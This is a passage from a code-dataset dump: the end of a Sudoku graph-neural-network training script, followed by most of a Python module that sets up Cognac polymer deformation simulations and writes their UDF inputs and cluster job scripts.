solution[-1].argmax(dim=3).to(device)\n print(\"Solved puzzles in the current mini-batch:\")\n print((final_solution.view(-1, 81) == targets.view(batch_size, 81)).all(dim=1))\n\n # Visualize graph iteration for one of the puzzles\n ix = 0\n for i in range(gnn.n_iters):\n tools.draw_sudoku(solution[i, ix], logits=True)\n\n fraction_solved = fraction_of_solved_puzzles(gnn, testloader, device)\n print(f\"Accuracy {fraction_solved}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"huongdo108/graph-neural-networks-solve-sudoku","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"86477604675","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n##### Import #####\nfrom UDFManager import *\n\nimport argparse\nimport codecs\nimport numpy as np\nimport os\nimport platform\nimport sys\nimport uuid\n\nimport cognac_deform.variables as var\n################\n##### Main #####\ndef deform():\n\t# Read in all the conditions\n\tread_all()\n\t# \n\tsetup()\n\treturn\n\n###################################\n# Read in all the conditions\ndef read_all():\n\tread_arg()\n\tread_nw_cond()\n\tread_sim_cond()\n\treturn\n\ndef read_arg():\n\tparser = argparse.ArgumentParser(description='Select udf file to read !')\n\tparser.add_argument('udf', help=\"udf file name to read previous simulation\")\n\targs = parser.parse_args()\n\tif args.udf:\n\t\tif len(args.udf.split('.')) != 2 or args.udf.split('.')[1] != 'udf':\n\t\t\tprint('\\nthe file name you selected is not a udf file !')\n\t\t\tsys.exit('select proper udf file to read.')\n\t\telif not os.access(args.udf, os.R_OK):\n\t\t\tsys.exit('\\nSelected udf of ' + args.udf + ' seems not to exist !\\nbye now!!')\n\t\telse:\n\t\t\tvar.read_udf = args.udf\n\telse:\n\t\tprint('no udf file is selected')\n\t\tsys.exit('select proper udf file to read.')\n\treturn\n\n# Read the conditions of the calculation target\ndef read_nw_cond():\n\tif not os.access('target_condition.udf', os.R_OK):\n\t\tsys.exit(\"\\n'target_condition.udf' does not exist.\")\n\telse:\n\t\tcond_u = UDFManager('target_condition.udf')\n\t\tvar.func = cond_u.get('TargetCond.NetWork.N_Strands')\n\t\tvar.nu = cond_u.get('TargetCond.System.Nu')\n\treturn\n\n# Set up the simulation conditions.\ndef read_sim_cond():\n\tif os.path.isfile('deform_condition.udf'):\n\t\tvar.deform_udf = 'deform_condition.udf'\n\t\tread_and_set()\n\telse:\n\t\twhile not os.path.isfile('../deform_condition.udf'):\n\t\t\tprint('\\nIn the parent directory, no \"deform_condition.udf\" is found !')\n\t\t\tprint('New one will be generated.')\n\t\t\tprint('Please, modify and save it !\\n')\n\t\t\tmake_newudf()\n\t\t\tinput('Press ENTER to continue...')\n\t\tvar.deform_udf = '../deform_condition.udf'\n\t\tread_and_set()\n\treturn\n\n# make new udf when not found.\ndef make_newudf():\n\tcontents = '''\n\t\\\\begin{def}\n\tCalcConditions:{\n\t\tCognac_ver:select{\"cognac112\"} \"使用する Cognac のバージョン\",\n\t\tCores: int \"計算に使用するコア数を指定\"\n\t\t} \"Cognac による計算の条件を設定\"\n\tSimpleDeformation:{\n\t\tDeformMode:select{\"none\", \"Stretch\", \"Shear\", \"both\"} \"変形モードを選択\",\n\t\t\tStretch:{\n\t\t\t\tDeformRate[]:float \"これらは変形レートのリスト\",\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t\tShear:{\n\t\t\t\tDeformRate[]:float \"これらは変形レートのリスト\",\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t\tboth:{\n\t\t\t\tDeformRate[]:float 
\"これらは変形レートのリスト\",\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t} \"計算ターゲットの条件を設定\"\t\t\n\tCycleDeformation:{\n\t\tCyclicDeform:select{\"none\", \"CyclicStretch\", \"CyclicShear\"} \"変形モードを選択\",\n\t\tCyclicStretch:{\n\t\t\tStretchConditions[]:{\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tRepeat:int \"サイクルの繰り返し数\",\n\t\t\t\tDeformRate[]:float \"これらは変形レートのリスト\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t\t}\n\t\tCyclicShear:{\n\t\t\tShearConditions[]:{\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tRepeat:int \"サイクルの繰り返し数\",\n\t\t\t\tDeformRate[]:float \"これらは変形レートのリスト\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t\t}\n\t\t} \"計算ターゲットの条件を設定\"\n\tStepDeformation:{\n\t\tStepDeform:select{\"none\", \"StepStretch\", \"StepShear\"} \"変形モードを選択\",\n\t\tStepStretch:{\n\t\t\tStretchConditions:{\n\t\t\t\tDeformation:{\n\t\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\t\tDeformRate:float \"変形レート\",\n\t\t\t\t\tDeformSteps:int \"シミュレーションのステップ数\"\n\t\t\t\t\t}\n\t\t\t\tRelaxation[]:{\n\t\t\t\t\tRelaxationTime:int \"緩和を観測する時間\",\n\t\t\t\t\tCalcSteps:int \"緩和時間の分割数\",\n\t\t\t\t\t}\n\t\t\t\tRepeat[]:{\n\t\t\t\t\tRepeat:int \"繰り返し数\",\n\t\t\t\t\tRelaxationTime:int \"緩和を観測する���間\",\n\t\t\t\t\tCalcSteps:int \"緩和時間の分割数\",\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tStepShear:{\n\t\t\tShearConditions:{\n\t\t\t\tDeformation:{\n\t\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\t\tDeformRate:float \"変形レート\",\n\t\t\t\t\tDeformSteps:int \"シミュレーションのステップ数\"\n\t\t\t\t\t}\n\t\t\t\tRelaxation[]:{\n\t\t\t\t\tRelaxationTime:int \"緩和を観測する時間\",\n\t\t\t\t\tCalcSteps:int \"緩和時間の分割数\",\n\t\t\t\t\t}\n\t\t\t\tRepeat[]:{\n\t\t\t\t\tRepeat:int \"繰り返し数\",\n\t\t\t\t\tRelaxationTime:int \"緩和を観測する時間\",\n\t\t\t\t\tCalcSteps:int \"緩和時間の分割数\",\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t} \"計算ターゲットの条件を設定\"\n\t\\end{def}\t\n\n\t\\\\begin{data}\n\tCalcConditions:{\"cognac112\",1}\n\tSimpleDeformation:{\n\t\t\"both\",\n\t\t\t{\n\t\t\t[1.0e-03,5.0e-4,1.0e-04,5.0e-05]\n\t\t\t3.00,\n\t\t\t1.0e-02\n\t\t\t}\n\t\t\t{\n\t\t\t[1.0e-03,5.0e-4,1.0e-04,5.0e-05]\n\t\t\t2.0,\n\t\t\t1.0e-02\n\t\t\t}\n\t\t\t{\n\t\t\t[1.0e-03,5.0e-4,1.0e-04,5.0e-05]\n\t\t\t3.00,\n\t\t\t1.0e-02\n\t\t\t}\n\t\t}\n\tCycleDeformation:{\n\t\t\"CyclicShear\",\n\t\t\t{\n\t\t\t\t[\n\t\t\t\t\t{2.0,\n\t\t\t\t\t3,\n\t\t\t\t\t[1.0e-03,1.0e-04]\n\t\t\t\t\t1.0e-02\n\t\t\t\t\t}\n\t\t\t\t\t{3.0,\n\t\t\t\t\t3,\n\t\t\t\t\t[1.0e-03,1.00e-04,1.00e-05]\n\t\t\t\t\t1.00e-02\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t\t{\n\t\t\t\t[\n\t\t\t\t\t{2.00,\n\t\t\t\t\t3,\n\t\t\t\t\t[1.0e-03,1.00e-04]\n\t\t\t\t\t1.00e-02\n\t\t\t\t\t}\n\t\t\t\t\t{3.00,\n\t\t\t\t\t3,\n\t\t\t\t\t[1.00e-03,1.00e-04,1.00e-05]\n\t\t\t\t\t1.00e-02\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t}\n\tStepDeformation:{\n\t\t\"StepStretch\",\n\t\t\t{\n\t\t\t\t{\n\t\t\t\t{1.50,5.0e-02,200}\n\t\t\t\t[{100000,500}{100000,100}]\n\t\t\t\t[{3,1000000,500}]\n\t\t\t\t}\n\t\t\t}\n\t\t\t{\n\t\t\t\t{\n\t\t\t\t{1.00,0.10,200}\n\t\t\t\t[{100000,500}{100000,100}]\n\t\t\t\t[{3,1000000,500}]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\\end{data}\n\t'''\n\t###\n\twith codecs.open('../deform_condition.udf', 'w', 'utf_8') as f:\n\t\tf.write(contents)\n\treturn\n\n# Read udf and setup initial conditions\ndef read_and_set():\n\tdic={'y':True,'yes':True,'q':False,'quit':False}\n\twhile True:\n\t\t# read udf\n\t\tread_condition()\n\t\t# select\n\t\tinit_calc()\n\t\tprint('Change UDF: type [r]eload')\n\t\tprint('Quit input process: type 
[q]uit')\n\t\tinp = input('Condition is OK ==> [y]es >> ').lower()\n\t\tif inp in dic:\n\t\t\tinp = dic[inp]\n\t\t\tbreak\n\t\tprint('##### \\nRead Condition UDF again \\n#####\\n\\n')\n\tif inp:\n\t\treturn\n\telse:\n\t\tsys.exit(\"##### \\nQuit !!\")\n\n# Read condition udf\ndef read_condition():\n\tu = UDFManager(var.deform_udf)\n\tu.jump(-1)\n\t# 使用するCognacのバージョン\n\tvar.ver_Cognac = u.get('CalcConditions.Cognac_ver')\n\t# 計算に使用するコア数\n\tvar.core = u.get('CalcConditions.Cores')\n\t# Simple Deformation\n\tvar.simple_def_mode = u.get('SimpleDeformation.DeformMode').lower()\n\tif var.simple_def_mode == 'stretch':\n\t\tvar.sim_rate_list = u.get('SimpleDeformation.Stretch.DeformRate[]')\n\t\tvar.sim_deform_max = u.get('SimpleDeformation.Stretch.MaxDeformation')\n\t\tvar.sim_resolution = u.get('SimpleDeformation.Stretch.Resolution')\n\t\tvar.sim_deform = var.simple_def_mode\n\telif var.simple_def_mode == 'shear':\n\t\tvar.sim_rate_list = u.get('SimpleDeformation.Shear.DeformRate[]')\n\t\tvar.sim_deform_max = u.get('SimpleDeformation.Shear.MaxDeformation')\n\t\tvar.sim_resolution = u.get('SimpleDeformation.Shear.Resolution')\n\t\tvar.sim_deform = var.simple_def_mode\n\telif var.simple_def_mode == 'both':\n\t\tvar.sim_rate_list = u.get('SimpleDeformation.both.DeformRate[]')\n\t\tvar.sim_deform_max = u.get('SimpleDeformation.both.MaxDeformation')\n\t\tvar.sim_resolution = u.get('SimpleDeformation.both.Resolution')\n\t# Cyclic Deformation\n\ttmp = []\n\tvar.cyclic_deform = u.get('CycleDeformation.CyclicDeform')\n\tif var.cyclic_deform == 'CyclicStretch':\n\t\ttmp = u.get('CycleDeformation.CyclicStretch.StretchConditions[]')\n\telif var.cyclic_deform == 'CyclicShear':\n\t\ttmp = u.get('CycleDeformation.CyclicShear.ShearConditions[]')\n\tfor data in tmp:\n\t\tmax_strain, repeat, ratelist, resolution = data\n\t\tvar.cyc_deform_cond_dic[max_strain] = [repeat, ratelist, resolution]\n\t\t# var.cyc_deform_max_list.append(data[0])\n\t\t# var.cyc_repeat.append(data[1])\n\t\t# var.cyc_ratelist.append(data[2])\n\t\t# var.cyc_resolution.append(data[3])\n\t# Step Deformation\n\tvar.step_deform = u.get('StepDeformation.StepDeform')\n\tif var.step_deform == 'StepShear':\n\t\t[var.step_deform_max, var.step_rate, var.step_steps] = u.get('StepDeformation.StepShear.ShearConditions.Deformation')\n\t\tdeform_time = var.step_deform_max/var.step_rate\n\t\t#\n\t\tvar.step_relaxation = u.get('StepDeformation.StepShear.ShearConditions.Relaxation[]')\n\t\tvar.step_repeat = u.get('StepDeformation.StepShear.ShearConditions.Repeat[]')[0]\n\telif var.step_deform == 'StepStretch':\n\t\t[var.step_deform_max, var.step_rate, var.step_steps] = u.get('StepDeformation.StepStretch.StretchConditions.Deformation')\n\t\tif var.step_deform_max == 1.0:\n\t\t\tsys.exit('\\nStep Stretch Condition is not proper !!\\nMax Deformation should be greater than 1.0 !')\n\t\telse:\n\t\t\tdeform_time = abs(var.step_deform_max - 1)/var.step_rate\n\t\t#\n\t\tvar.step_relaxation = u.get('StepDeformation.StepStretch.StretchConditions.Relaxation[]')\n\t\tvar.step_repeat = u.get('StepDeformation.StepStretch.StretchConditions.Repeat[]')[0]\n\t#\n\tif var.step_deform != 'none':\n\t\tdt = min(var.sim_time_div, deform_time/var.step_steps)\t# dt の暫定値を決定\n\t\ttotal_steps = round(deform_time/dt)\n\t\tinterval = max(1, round(total_steps/var.step_steps))\t# 整数値の interval を決定\n\t\tdt = round(deform_time/var.step_steps/interval, 4)\t\t# 小数点4桁で丸めたdtを決定\n\t\tvar.step_deform_time = [dt, total_steps, interval]\n\t#\n\tif var.simple_def_mode == 'none' and var.cyclic_deform == 
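The rounding block at the end of `read_condition()` quantises the step-deformation schedule so the output interval is an integer and `delta_T` stays at four decimals. A worked example using the sample data above (StepStretch: MaxDeformation 1.50, rate 5.0e-02, 200 steps) and an assumed `sim_time_div` of 0.01, since its actual value is set elsewhere in this module:

```python
# Illustrative numbers only; mirrors the dt/total_steps/interval logic above.
sim_time_div = 0.01                          # assumed value of var.sim_time_div
deform_time = abs(1.50 - 1) / 5.0e-02        # 10.0 time units of deformation
dt = min(sim_time_div, deform_time / 200)    # provisional dt -> 0.01
total_steps = round(deform_time / dt)        # 1000
interval = max(1, round(total_steps / 200))  # integer output interval -> 5
dt = round(deform_time / 200 / interval, 4)  # final dt, 4 decimals -> 0.01
print([dt, total_steps, interval])           # [0.01, 1000, 5]
```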
'none' and var.step_deform == 'none':\n\t\tsys.exit('No proper condition is selected.\\nBye!')\n\treturn\n# \ndef init_calc():\n\ttext = \"################################################\" + \"\\n\"\n\ttext += \"Cores used for simulation\\t\\t\" + str(var.core ) + \"\\n\"\n\ttext += \"################################################\" + \"\\n\"\n\tif var.simple_def_mode != 'none':\n\t\ttext += \"Deform mode:\\t\\t\\t\\t\" + str(var.simple_def_mode) + \"\\n\"\n\t\ttext += \"Deform Rate:\\t\\t\" + ', '.join([f\"{x:.1e}\" for x in var.sim_rate_list]) + \"\\n\"\n\t\ttext += \"Maximum Strain:\\t\\t\\t\\t\" + str(var.sim_deform_max) + \"\\n\"\n\t\ttext += \"Resolution:\\t\\t\\t\\t\" + str(round(var.sim_resolution,4)) + \"\\n\"\n\t\ttext += \"################################################\" + \"\\n\"\n\tif var.cyclic_deform != 'none':\n\t\ttext += \"Cyclic Deform mode:\\t\\t\\t\" + str(var.cyclic_deform) + \"\\n\"\n\t\tcount = 0\n\t\tfor key in var.cyc_deform_cond_dic:\n\t\t\ttext += f'Cyclic condition #{count}\\n'\n\t\t\ttext += f\"\\tMaximum Strain:\\t\\t\\t{key:.1f}\\n\"\n\t\t\ttext += f\"\\tRepeat:\\t\\t\\t\\t{var.cyc_deform_cond_dic[key][0]}\\n\"\n\t\t\ttext += \"\\tCyclic Deform Rate:\\t\" + ', '.join([f\"{x:.1e}\" for x in var.cyc_deform_cond_dic[key][1]]) + \"\\n\"\n\t\t\ttext += \"\\tResolution:\\t\\t\\t\" + str(round(var.cyc_deform_cond_dic[key][2], 4)) + \"\\n\"\n\t\ttext += \"################################################\" + \"\\n\"\n\tif var.step_deform != 'none':\n\t\ttext += f\"Step Deform mode:\\t\\t\\t{var.step_deform:}\\n\"\n\t\ttext += f\"Step Strain:\\t\\t\\t\\t{var.step_deform_max:.1f}\\n\"\n\t\ttext += f\"Deformation rate:\\t\\t\\t{var.step_rate:.1e}\\n\"\n\t\ttext += f\"Deformation steps:\\t\\t\\t{var.step_steps:}\\n\"\n\t\ttext += f\"Simulation time:\\t\\t{var.step_deform_time:}\\n\"\n\t\ttext += \"#\\n\"\n\t\tfor i, data in enumerate(var.step_relaxation):\n\t\t\ttext += f\"Relaxation-{i:}\\n\"\n\t\t\ttext += f\"\\tRelaxation Time:\\t\\t{data[0]:.1e}\\n\"\n\t\t\ttext += f\"\\tCalc. steps:\\t\\t\\t{data[1]:}\\n\"\n\t\ttext += \"#\\n\"\n\t\ttext += f'Repeat:\\t\\t\\t\\t\\t{var.step_repeat[0]:}\\n'\n\t\ttext += f'Relaxation steps:\\t\\t\\t{var.step_repeat[1]:.1e}\\n'\n\t\ttext += f'Calc. 
Steps:\\t\\t\\t\\t{var.step_repeat[2]:}\\n'\n\t\ttext += \"################################################\" + \"\\n\"\n\tprint(text)\n\treturn\n\n#######################################\n#\ndef setup():\n\tprint(\"\\n\\nSetting UP progress !!\\n\")\n\tif var.simple_def_mode != 'none':\n\t\tsetup_simple_deform()\n\tif var.cyclic_deform != 'none':\n\t\tsetup_cyclic_deform()\n\tif var.step_deform != 'none':\n\t\tsetup_step_deform()\n\treturn\n\n#####\n# 単純変形の設定\ndef setup_simple_deform():\n\tif var.simple_def_mode == 'both':\n\t\tfor var.sim_deform in ['shear', 'stretch']:\n\t\t\tset_simple_eachrate()\n\telse:\n\t\tset_simple_eachrate()\n\treturn\n\n\ndef set_simple_eachrate():\n\tvar.sim_basedir = f\"{var.sim_deform:}_calculation_read_{var.read_udf.split('.')[0]:}_until_{var.sim_deform_max:}\"\n\tif os.path.exists(var.sim_basedir):\n\t\tprint(\"Use existing dir of \", var.sim_basedir)\n\telse:\n\t\tprint(\"Make new dir of \", var.sim_basedir)\n\t\tos.makedirs(var.sim_basedir)\n\n\tc_dir = os.getcwd().split('\\\\')[-1]\n\tvar.title_base = str(c_dir.split('_', 2)[-1]) + f\"_{var.sim_deform:}_calculation_until_{var.sim_deform_max:}_\"\n\t# プラットフォームに応じて命令を変更\n\tif platform.system() == \"Windows\":\n\t\ttask = 'call calc_all.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\telif platform.system() == \"Linux\":\n\t\ttask = 'sh calc_all.sh\\n'\n\t\tfilename = 'calc_all.sh'\n\t\t#\n\t\ttask2 = 'sh eval_all.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\toption = f'simple_deform.py -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} -s \\n'\n\t\tmake_batch_series([f'rate_{rate:4.0e}' for rate in var.sim_rate_list], var.sim_basedir, task2, filename2, option)\n\tmake_batch_series([f'rate_{rate:4.0e}' for rate in var.sim_rate_list], var.sim_basedir, task, filename,'')\n\n\tfor var.sim_rate in var.sim_rate_list:\n\t\tvar.sim_ratedir = os.path.join(var.sim_basedir, f\"rate_{var.sim_rate:4.0e}\")\n\t\t#\n\t\tif os.path.exists(var.sim_ratedir):\n\t\t\tprint(\"Use existing dir of \", var.sim_ratedir)\n\t\telse:\n\t\t\tprint(\"Make new dir of \", var.sim_ratedir)\n\t\t\tos.makedirs(var.sim_ratedir)\n\t\t#\n\t\tset_rotation_simple()\n\treturn\n\ndef set_rotation_simple():\n\t# 変形方法に応じて回転方向を設定\n\tif var.sim_deform == 'shear':\n\t\tvar.step_rotate = ['base', 'x', 'y', 'z', 'yx', 'zx']\n\telif var.sim_deform == 'stretch':\n\t\tvar.step_rotate = ['base', 'x', 'y']\n\t# プラットフォームに応じて命令を変更\n\tif platform.system() == \"Windows\":\n\t\ttask = 'calc.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\t\toption = f'evaluate_simple_deform -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} -a \\n'\n\telif platform.system() == \"Linux\":\n\t\ttask = 'pjsub calc.sh\\n'\n\t\tfilename = 'calc_all.sh'\n\t\toption = ''\n\t\t#\n\t\ttask2 = 'sh eval.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\toption2 = f'simple_deform.py -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} -a \\n'\n\t\tmake_batch_series(['rotate_' + dir for dir in var.step_rotate], var.sim_ratedir, task2, filename2, option2)\n\tmake_batch_series(['rotate_' + dir for dir in var.step_rotate], var.sim_ratedir, task, filename, option)\n\n\tfor rotate in var.step_rotate:\n\t\tset_rotate_dir_sim(rotate)\n\t\tset_udf_batch_sim()\n\treturn\n\ndef set_rotate_dir_sim(rotate):\n\ttmp_dir = f'rotate_{rotate}'\n\tvar.title_name = var.title_base + f\"rate_{var.sim_rate:4.0e}\" + f'_rotate_{rotate}'\n\tvar.sim_dirlist.append(tmp_dir)\n\tvar.calc_dir = os.path.join(var.sim_ratedir, tmp_dir)\n\tif os.path.exists(var.calc_dir):\n\t\tprint(\"Use existing dir of \", 
var.calc_dir)\n\telse:\n\t\tprint(\"Make new dir of \", var.calc_dir)\n\t\tos.makedirs(var.calc_dir)\n\n\tvar.base_udf = os.path.join(var.calc_dir, 'base.udf')\n\tu = UDFManager(var.read_udf)\n\tu.jump(1)\n\tu.eraseRecord(record_pos=0, record_num=u.totalRecord()-1)\n\tif rotate != 'base':\n\t\trotate_position(u, rotate)\n\tu.write(var.base_udf)\n\treturn\n\n# ファイル名を設定し、バッチファイルを作成\ndef set_udf_batch_sim():\n\t# UDFファイル名を設定\n\tuin = f'rate_{var.sim_rate:4.0e}_uin.udf'\n\t# プラットフォームに応じてバッチファイルを設定\n\tif platform.system() == \"Windows\":\n\t\tmake_title(var.title_name)\n\t\tvar.batch = \"#!/bin/bash\\n\"\n\t\ttarget_bat = 'calc.bat'\n\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uin.replace(\"uin\", \"out\") + ' -n ' + str(var.core) +' \\n'\n\t\tvar.batch += f'evaluate_simple_deform -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} \\n'\n\telif platform.system() == \"Linux\":\n\t\ttarget_bat = 'calc.sh'\n\t\tvar.batch = '#PJM -L \"node=1\"\\n'\n\t\tvar.batch += '#PJM -L \"rscgrp=small\"\\n'\n\t\tvar.batch += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\tvar.batch += '#PJM -g hp220245\\n'\n\t\tvar.batch += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\tvar.batch += '#PJM -S\\n'\n\t\tvar.batch += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\tvar.batch += 'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\tvar.batch += '${COGNAC} -I ' + uin + ' -O' + uin.replace(\"uin\", \"out\") + ' -n 48 \\n'\n\t\t#\n\t\teval = '#!/bin/sh\\n'\n\t\teval += f'simple_deform.py -f {str(var.func):} -n {str(var.nu):} -m {var.sim_deform:} \\n'\n\t\twrite_batchfile(var.calc_dir, 'eval.sh', eval)\n\twrite_batchfile(var.calc_dir, target_bat, var.batch)\n\n\tudf_in = os.path.join(var.calc_dir, uin)\n\tmake_simpledeform_udf(udf_in)\n\treturn\n\n#-----\ndef make_simpledeform_udf(udf_in):\n\tif var.sim_deform == 'stretch':\n\t\tdeform_time = abs(var.sim_deform_max - 1)/var.sim_rate\n\telif var.sim_deform == 'shear':\n\t\tdeform_time = var.sim_deform_max/var.sim_rate\n\t#\n\ttime_total = round(deform_time/var.sim_time_div)\n\ttime_1_step = round(var.sim_resolution/var.sim_time_div/var.sim_rate)\n\t#\n\tu = UDFManager(var.base_udf)\n\t# goto global data\n\tu.jump(-1)\n\t# Dynamics_Conditions\n\tp = 'Simulation_Conditions.Dynamics_Conditions.'\n\tu.put(100000.,\t\tp + 'Max_Force')\n\tu.put(var.sim_time_div,\tp + 'Time.delta_T')\n\tu.put(time_total,\tp + 'Time.Total_Steps')\n\tu.put(time_1_step,\tp + 'Time.Output_Interval_Steps')\n\tu.put(1.0,\t\t\tp + 'Temperature.Temperature')\n\tu.put(0, \t\t\tp + 'Temperature.Interval_of_Scale_Temp')\n\tu.put(0,\t\t\tp + 'Pressure_Stress.Pressure')\n\n\t# Deformation\n\tif var.sim_deform == 'stretch':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Cell_Deformation', \t\tp + 'Method')\n\t\tu.put('Simple_Elongation', \t\tp + 'Cell_Deformation.Method')\n\t\tu.put('Initial_Strain_Rate', \tp + 'Cell_Deformation.Simple_Elongation.Input_Method')\n\t\tif var.sim_deform_max < 1.:\n\t\t\tvar.sim_rate = -1*var.sim_rate\n\t\tu.put(var.sim_rate,\t \t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Initial_Strain_Rate.Rate')\n\t\tu.put(0.5, \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Poisson_Ratio')\n\t\tu.put('z', \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Axis')\n\t\tu.put(1, \t\t\t\t\t\tp + 'Cell_Deformation.Interval_of_Deform')\n\t\tu.put(0, \t\t\t\t\t\tp + 'Cell_Deformation.Deform_Atom')\n\telif var.sim_deform == 'shear':\n\t\tp = 
\"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Lees_Edwards', \tp + 'Method')\n\t\tu.put('Steady', \t\tp + 'Lees_Edwards.Method')\n\t\tu.put(var.sim_rate, \t\t\tp + 'Lees_Edwards.Steady.Shear_Rate')\n\t\n\t# Output_Flags\n\tu.put([1, 1, 1], 'Simulation_Conditions.Output_Flags.Structure')\n\n\t# Read_Set_of_Molecules\n\tp = 'Initial_Structure.Read_Set_of_Molecules'\n\tu.put(['', -1], p)\n\n\t# Generate_Method\n\tp = 'Initial_Structure.Generate_Method.'\n\tu.put('Restart', \t\tp + 'Method')\n\tu.put(['', -1, 1, 1], \tp + 'Restart')\n\n\t# Relaxation\n\tp = 'Initial_Structure.Relaxation.'\n\tu.put(0, p + 'Relaxation')\n\t#--- Write UDF ---\n\tu.write(udf_in)\n\treturn\n\n#######\n# 繰り返し変形の設定\ndef setup_cyclic_deform():\n\tset_cyclic_basedir()\n\tset_each_cycle()\n\treturn\n\ndef set_cyclic_basedir():\n\tvar.cyc_dir = var.cyclic_deform + '_read_' + var.read_udf.split('.')[0]\n\tif os.path.exists(var.cyc_dir):\n\t\tprint(\"Use existing dir of \", var.cyc_dir)\n\telse:\n\t\tprint(\"Make new dir of \", var.cyc_dir)\n\t\tos.makedirs(var.cyc_dir)\n\treturn\n#\ndef set_each_cycle():\n\tfor cyc_def_max in var.cyc_deform_cond_dic:\n\t\tfor cyc_rate in var.cyc_deform_cond_dic[cyc_def_max][1]:\n\t\t\tcond_dir = 'Deform_until_' + str(cyc_def_max).replace('.', '_') + \"_rate_\" + f\"{cyc_rate:.1e}\".replace('.', '_')\n\t\t\tvar.cyc_dirlist.append(cond_dir)\n\t\t\tmiddle_dir = os.path.join(var.cyc_dir, cond_dir)\n\t\t\tif os.path.exists(middle_dir):\n\t\t\t\tprint(\"Use existing dir of \", middle_dir)\n\t\t\telse:\n\t\t\t\tprint(\"Make new dir of \", middle_dir)\n\t\t\t\tos.makedirs(middle_dir)\n\t\t\tset_cyclic_rotation(middle_dir, cyc_def_max, cyc_rate)\n\t# プラットフォームに応じて命令を変更\n\tif platform.system() == \"Windows\":\n\t\ttask = 'call calc_all.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\telif platform.system() == \"Linux\":\n\t\ttask = 'sh calc_all.sh\\n'\n\t\tfilename = 'calc_all.sh'\n\t\t#\n\t\ttask2 = 'sh eval_all.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\tmake_batch_series(var.cyc_dirlist, var.cyc_dir, task2, filename2,'')\n\tmake_batch_series(var.cyc_dirlist, var.cyc_dir, task, filename,'')\n\treturn\n\ndef set_cyclic_rotation(middle_dir, cyc_def_max, cyc_rate):\n\tif var.cyclic_deform == 'CyclicShear':\n\t\tvar.cyc_rotate = ['base', 'x', 'y', 'z', 'yx', 'zx']\n\t\tdeform = 'shear'\n\telif var.cyclic_deform == 'CyclicStretch':\n\t\tvar.cyc_rotate = ['base', 'x', 'y']\n\t\tdeform = 'stretch'\n\tfor rotate in var.cyc_rotate:\n\t\tset_cyc_rotate_dir(middle_dir, rotate, cyc_def_max, cyc_rate)\n\t# プラットフォームに応じて命令を変更\n\tif platform.system() == \"Windows\":\n\t\ttask = 'call calc.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\t\toption = f'evaluate_cyclic_deform -f {str(var.func):} -n {str(var.nu):} -m {deform:} -a \\n'\n\telif platform.system() == \"Linux\":\n\t\ttask = 'sh calc.sh\\n'\n\t\tfilename = 'calc_all.sh'\n\t\toption = ''\n\t\t# 評価用のバッチを作成\n\t\ttask2 = 'sh eval.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\toption2 = f'cyclic_deform.py -f {str(var.func):} -n {str(var.nu):} -m {deform:} -a \\n'\n\t\tmake_batch_series(['rotate_' + dir for dir in var.cyc_rotate], middle_dir, task2, filename2, option2)\n\tmake_batch_series(['rotate_' + dir for dir in var.cyc_rotate], middle_dir, task, filename, option)\n\treturn\n\ndef set_cyc_rotate_dir(middle_dir, rotate, cyc_def_max, cyc_rate):\n\ttmp_dir = f'rotate_{rotate}'\n\tvar.calc_dir = os.path.join(middle_dir, tmp_dir)\n\tif os.path.exists(var.calc_dir):\n\t\tprint(\"Use existing dir of \", var.calc_dir)\n\telse:\n\t\tprint(\"Make new dir of \", 
